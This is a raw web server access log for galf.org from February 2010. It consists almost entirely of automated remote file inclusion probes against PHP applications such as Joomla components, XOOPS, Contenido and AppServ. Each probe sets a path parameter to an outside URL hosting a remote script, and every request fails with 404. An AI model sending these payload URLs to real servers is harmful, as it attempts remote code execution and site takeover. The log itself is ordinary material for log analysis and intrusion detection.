207.46.199.48 - - [15/Feb/2010:00:50:43 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
125.141.91.138 - - [15/Feb/2010:00:51:01 -0800] "GET /logs/access_100104.log%20%20///administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.219.195.66 - - [15/Feb/2010:00:51:01 -0800] "GET /logs/access_091228.log/error.php?dir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:00:52:02 -0800] "GET /logs/access_100125.log//xoops//xoops_lib/modules/protector/oninstall.php?mydirname=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:00:52:02 -0800] "GET /xoops//xoops_lib/modules/protector/oninstall.php?mydirname=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:00:52:02 -0800] "GET /logs//xoops//xoops_lib/modules/protector/oninstall.php?mydirname=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:00:52:34 -0800] "GET /logs/access_100201.log//xoops//xoops_lib/modules/protector/oninstall.php?mydirname=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
187.45.193.155 - - [15/Feb/2010:00:52:42 -0800] "GET /logs/access_091228.log/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.de-port.com//administrator/components/com_virtuemart/id1autoscan.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
187.45.193.155 - - [15/Feb/2010:00:52:55 -0800] "GET /logs/access_091228.log/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.de-port.com//administrator/components/com_virtuemart/id1autoscan.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
187.45.193.155 - - [15/Feb/2010:00:53:43 -0800] "GET /logs/access_100111.log/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.de-port.com//administrator/components/com_virtuemart/id1autoscan.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:00:54:45 -0800] "GET /logs/access_091123.log//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:00:55:01 -0800] "GET /logs/access_090907.log//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
187.45.193.155 - - [15/Feb/2010:00:55:06 -0800] "GET /logs/access_100111.log/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.de-port.com//administrator/components/com_virtuemart/id1autoscan.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.230.162.220 - - [15/Feb/2010:00:56:07 -0800] "GET /index.php?body=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.230.162.220 - - [15/Feb/2010:00:56:07 -0800] "GET /logs/access_090914.log%20%20/index.php?body=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.230.162.220 - - [15/Feb/2010:00:56:07 -0800] "GET /logs/index.php?body=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.230.162.220 - - [15/Feb/2010:00:57:35 -0800] "GET /logs/access_091026.log%20%20/index.php?body=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.234.20.117 - - [15/Feb/2010:00:57:41 -0800] "GET /logs/access_090907.log//modules/xoopsgallery/errors.php?error=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.234.20.117 - - [15/Feb/2010:00:57:42 -0800] "GET /logs//modules/xoopsgallery/errors.php?error=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.234.20.117 - - [15/Feb/2010:00:57:42 -0800] "GET /modules/xoopsgallery/errors.php?error=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.193.225.60 - - [15/Feb/2010:00:57:57 -0800] "GET /logs//contenido/classes/class.inuse.php?cfg[path][contenido]=http://shtuchki.org.ua/images/icons/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.193.225.60 - - [15/Feb/2010:00:57:57 -0800] "GET /contenido/classes/class.inuse.php?cfg[path][contenido]=http://shtuchki.org.ua/images/icons/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.193.225.60 - - [15/Feb/2010:00:57:57 -0800] "GET /logs/access_091228.log//contenido/classes/class.inuse.php?cfg[path][contenido]=http://shtuchki.org.ua/images/icons/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.70.79.113 - - [15/Feb/2010:00:57:59 -0800] "GET /logs/access_100201.log//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.70.79.113 - - [15/Feb/2010:00:57:59 -0800] "GET /logs//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.70.79.113 - - [15/Feb/2010:00:57:59 -0800] "GET /appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.193.225.60 - - [15/Feb/2010:00:58:24 -0800] "GET /logs/access_091228.log//contenido/classes/class.inuse.php?cfg[path][contenido]=http://shtuchki.org.ua/images/icons/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.193.225.60 - - [15/Feb/2010:00:58:24 -0800] "GET /contenido/classes/class.inuse.php?cfg[path][contenido]=http://shtuchki.org.ua/images/icons/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.193.225.60 - - [15/Feb/2010:00:58:24 -0800] "GET /logs//contenido/classes/class.inuse.php?cfg[path][contenido]=http://shtuchki.org.ua/images/icons/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.70.79.113 - - [15/Feb/2010:00:58:26 -0800] "GET /logs/access_100125.log//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.193.225.60 - - [15/Feb/2010:00:58:40 -0800] "GET /contenido/classes/class.inuse.php?cfg[path][contenido]=http://shtuchki.org.ua/images/icons/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.193.225.60 - - [15/Feb/2010:00:58:40 -0800] "GET /logs/access_091228.log//contenido/classes/class.inuse.php?cfg[path][contenido]=http://shtuchki.org.ua/images/icons/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.193.225.60 - - [15/Feb/2010:00:58:40 -0800] "GET /logs//contenido/classes/class.inuse.php?cfg[path][contenido]=http://shtuchki.org.ua/images/icons/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.193.225.60 - - [15/Feb/2010:00:58:45 -0800] "GET /contenido/classes/class.inuse.php?cfg[path][contenido]=http://shtuchki.org.ua/images/icons/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.193.225.60 - - [15/Feb/2010:00:58:45 -0800] "GET /logs/access_091228.log//contenido/classes/class.inuse.php?cfg[path][contenido]=http://shtuchki.org.ua/images/icons/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.193.225.60 - - [15/Feb/2010:00:58:45 -0800] "GET /logs//contenido/classes/class.inuse.php?cfg[path][contenido]=http://shtuchki.org.ua/images/icons/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:00:59:33 -0800] "GET /logs/access_100111.log//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.234.20.117 - - [15/Feb/2010:00:59:35 -0800] "GET /logs/access_090713.log//modules/xoopsgallery/errors.php?error=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.70.79.113 - - [15/Feb/2010:00:59:44 -0800] "GET /logs//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.70.79.113 - - [15/Feb/2010:00:59:45 -0800] "GET /logs/access_100118.log%20%20//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.70.79.113 - - [15/Feb/2010:00:59:45 -0800] "GET /appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:01:00:18 -0800] "GET ///components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
62.140.23.24 - - [15/Feb/2010:01:00:18 -0800] "GET /logs////components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
62.140.23.24 - - [15/Feb/2010:01:00:18 -0800] "GET /logs/access.log%20%20////components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
62.140.23.24 - - [15/Feb/2010:01:00:43 -0800] "GET ///components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
62.140.23.24 - - [15/Feb/2010:01:00:43 -0800] "GET /logs////components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
62.140.23.24 - - [15/Feb/2010:01:00:45 -0800] "GET /logs/access.log%20%20////components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
62.140.23.24 - - [15/Feb/2010:01:00:49 -0800] "GET /logs/access.log%20%20////components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
62.140.23.24 - - [15/Feb/2010:01:00:49 -0800] "GET ///components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
62.140.23.24 - - [15/Feb/2010:01:00:51 -0800] "GET /logs////components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
208.70.79.113 - - [15/Feb/2010:01:00:51 -0800] "GET /logs/access_100118.log//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.70.79.113 - - [15/Feb/2010:01:02:13 -0800] "GET /logs/access_091019.log//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.70.79.113 - - [15/Feb/2010:01:02:19 -0800] "GET /logs/access_090928.log//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [15/Feb/2010:01:03:12 -0800] "GET /appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [15/Feb/2010:01:03:12 -0800] "GET /logs/access_100201.log//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.106.241.31 - - [15/Feb/2010:01:03:12 -0800] "GET //bbs//delete_comment.php?board_skin_path=http://www.winix.co.kr//thc/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.106.241.31 - - [15/Feb/2010:01:03:12 -0800] "GET /logs///bbs//delete_comment.php?board_skin_path=http://www.winix.co.kr//thc/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.106.241.31 - - [15/Feb/2010:01:03:12 -0800] "GET /logs/access.log///bbs//delete_comment.php?board_skin_path=http://www.winix.co.kr//thc/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [15/Feb/2010:01:03:12 -0800] "GET /logs//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [15/Feb/2010:01:03:41 -0800] "GET /logs/access_100125.log//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:01:03:47 -0800] "GET /logs/access_100201.log//bbs/write_update.php//gnuboard4//bbs/write_update.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [15/Feb/2010:01:03:53 -0800] "GET /appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [15/Feb/2010:01:03:54 -0800] "GET /logs//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [15/Feb/2010:01:03:54 -0800] "GET /logs/access_100118.log%20%20//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:01:04:01 -0800] "GET /logs/access_100125.log//bbs/write_update.php//gnuboard4//bbs/write_update.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [15/Feb/2010:01:04:18 -0800] "GET /logs//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [15/Feb/2010:01:04:18 -0800] "GET /appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [15/Feb/2010:01:04:19 -0800] "GET /logs/access_100201.log//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [15/Feb/2010:01:04:25 -0800] "GET /logs/access_100118.log%20%20//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [15/Feb/2010:01:04:25 -0800] "GET /appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [15/Feb/2010:01:04:25 -0800] "GET /logs//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.239.230.130 - - [15/Feb/2010:01:05:16 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.achetersalvia.fr//modules/mod_poll/test.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.galf.org"
61.72.64.119 - - [15/Feb/2010:01:05:17 -0800] "GET /logs/access.log///bbs//delete_comment.php?board_skin_path=http://www.winix.co.kr//thc/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.72.64.119 - - [15/Feb/2010:01:05:18 -0800] "GET //bbs//delete_comment.php?board_skin_path=http://www.winix.co.kr//thc/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.72.64.119 - - [15/Feb/2010:01:05:18 -0800] "GET /logs///bbs//delete_comment.php?board_skin_path=http://www.winix.co.kr//thc/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.239.230.130 - - [15/Feb/2010:01:05:34 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.achetersalvia.fr//modules/mod_poll/test.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.galf.org"
58.150.99.144 - - [15/Feb/2010:01:05:36 -0800] "GET /logs/access_100125.log//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [15/Feb/2010:01:05:38 -0800] "GET /logs/access_100201.log//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [15/Feb/2010:01:05:38 -0800] "GET /appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [15/Feb/2010:01:05:38 -0800] "GET /logs//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [15/Feb/2010:01:05:47 -0800] "GET /logs/access_100118.log//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [15/Feb/2010:01:06:13 -0800] "GET /logs/access_100118.log//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.70.79.113 - - [15/Feb/2010:01:06:46 -0800] "GET /logs/access_100201.log%20%20//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.70.79.113 - - [15/Feb/2010:01:07:06 -0800] "GET /logs/access_100125.log%20%20//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.243.44 - - [15/Feb/2010:01:07:40 -0800] "GET /index.php?body=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.243.44 - - [15/Feb/2010:01:07:40 -0800] "GET /logs/access_090914.log%20%20/index.php?body=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.243.44 - - [15/Feb/2010:01:07:40 -0800] "GET /logs/index.php?body=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.84.226 - - [15/Feb/2010:01:07:53 -0800] "GET /logs///bbs//delete_comment.php?board_skin_path=http://www.winix.co.kr//thc/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.84.226 - - [15/Feb/2010:01:07:53 -0800] "GET /logs/access.log///bbs//delete_comment.php?board_skin_path=http://www.winix.co.kr//thc/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.84.226 - - [15/Feb/2010:01:07:53 -0800] "GET //bbs//delete_comment.php?board_skin_path=http://www.winix.co.kr//thc/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:01:08:26 -0800] "GET /logs/access.log////components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
74.205.120.218 - - [15/Feb/2010:01:08:29 -0800] "GET ////components/com_extcalendar/config_extcalendar.php?mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.205.120.218 - - [15/Feb/2010:01:08:29 -0800] "GET /logs/////components/com_extcalendar/config_extcalendar.php?mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.205.120.218 - - [15/Feb/2010:01:08:29 -0800] "GET /logs/access_091228.log%20%20/////components/com_extcalendar/config_extcalendar.php?mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:01:08:50 -0800] "GET /logs/access.log////components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
74.205.120.218 - - [15/Feb/2010:01:09:08 -0800] "GET /logs/access.log%20%20/////components/com_extcalendar/config_extcalendar.php?mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:01:09:33 -0800] "GET /logs/access.log////components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
208.70.79.113 - - [15/Feb/2010:01:09:42 -0800] "GET /appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.70.79.113 - - [15/Feb/2010:01:09:42 -0800] "GET /logs//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.70.79.113 - - [15/Feb/2010:01:09:42 -0800] "GET /logs/access_100201.log//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.205.120.218 - - [15/Feb/2010:01:09:47 -0800] "GET ////components/com_extcalendar/config_extcalendar.php?mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.205.120.218 - - [15/Feb/2010:01:09:47 -0800] "GET /logs/////components/com_extcalendar/config_extcalendar.php?mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.205.120.218 - - [15/Feb/2010:01:09:47 -0800] "GET /logs/access_091228.log%20%20/////components/com_extcalendar/config_extcalendar.php?mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.205.120.218 - - [15/Feb/2010:01:10:27 -0800] "GET /logs/access.log%20%20/////components/com_extcalendar/config_extcalendar.php?mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [15/Feb/2010:01:11:06 -0800] "GET /logs//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [15/Feb/2010:01:11:06 -0800] "GET /logs/access_100201.log//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [15/Feb/2010:01:11:06 -0800] "GET /appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [15/Feb/2010:01:14:39 -0800] "GET /logs/access_100201.log%20%20//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [15/Feb/2010:01:14:47 -0800] "GET /logs/access_100201.log%20%20//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [15/Feb/2010:01:14:50 -0800] "GET /logs/access_100125.log%20%20//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [15/Feb/2010:01:14:59 -0800] "GET /logs/access_100125.log%20%20//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [15/Feb/2010:01:15:09 -0800] "GET /logs/access_100125.log%20%20//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [15/Feb/2010:01:15:30 -0800] "GET /logs/access_091102.log%20%20//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.142 - - [15/Feb/2010:01:15:50 -0800] "GET /logs//ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://hl0lhq.karl.or.kr/lhqboard/icon/member_image_box/3/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.142 - - [15/Feb/2010:01:15:50 -0800] "GET /ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://hl0lhq.karl.or.kr/lhqboard/icon/member_image_box/3/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.142 - - [15/Feb/2010:01:15:50 -0800] "GET /logs/access_100118.log//ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://hl0lhq.karl.or.kr/lhqboard/icon/member_image_box/3/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.205.120.218 - - [15/Feb/2010:01:16:56 -0800] "GET /logs/access_090907.log/////components/com_extcalendar/config_extcalendar.php?mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.70.79.113 - - [15/Feb/2010:01:17:25 -0800] "GET /logs/access_100125.log%20%20//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.70.79.113 - - [15/Feb/2010:01:17:36 -0800] "GET /logs/access_091102.log%20%20//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.205.120.218 - - [15/Feb/2010:01:18:17 -0800] "GET /administrator/components/com_pollxt/config_pollxt.php?mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.205.120.218 - - [15/Feb/2010:01:18:17 -0800] "GET /logs//administrator/components/com_pollxt/config_pollxt.php?mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
